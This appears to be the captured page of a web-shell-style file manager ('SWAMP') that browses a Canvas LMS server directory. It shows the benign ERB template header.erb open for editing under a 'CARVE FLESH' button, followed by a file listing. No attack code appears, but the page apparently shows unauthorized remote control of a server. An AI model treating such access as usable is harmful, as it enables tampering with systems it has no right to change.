░▒▓████████████████████████████████▓▒░ ░▒▓█ ▓▒░ ░▒▓█ ~ S W A M P ~ ▓▒░ ░▒▓█ ▓▒░ ░▒▓████████████████████████████████▓▒░
pplmvsvm
LOCATION:
/var/www/canvas/doc/api/method_details/html
☗ ROOT
↻ REFRESH
✎ CARVE FLESH
EDITING: header.erb
<div class="method_details <%= @index == 0 ? 'first' : '' %>"> <h2 class='api_method_name' name='<%= @method_link %>' data-subtopic='<%= @subtopic %>'> <a name='<%= @method_link %>' href='#<%= @method_link %>'> <%= object.tag("API").try(:text) %> </a> <% if @controller_path %> <span class='defined-in'><a href="https://github.com/instructure/canvas-lms/blob/master/<%= @controller_path %>"><%= "#{@route.requirements[:controller].camelize}Controller\##{@route.requirements[:action]}" %></a></span> <% end %> </h2> <% if @deprecated_method.present? %> <div class="deprecated deprecated_method"> <div class="note deprecated"> <strong>[DEPRECATED] This method is deprecated, effective <%= h @deprecated_method.effective_date %> (notice given <%= h @deprecated_method.notice_date %>):</strong> <%= htmlify_line @deprecated_method.description %> </div> </div> <% end %> <% if @beta %> <h3 class='beta'>BETA: This API endpoint is not finalized, and there could be breaking changes before its final release.</h3> <% end %> <%= yieldall %> </div>
CANCEL
Name
Type
Size
Modified
Actions
↩ ..
DIR
—
—
📄 header.erb
ERB
1.1 KB
2023-09-24 03:36
EDIT
📄 method_signature.erb
ERB
339 B
2023-09-24 03:36
EDIT
📄 setup.rb
RB
1.7 KB
2023-09-24 03:36
EDIT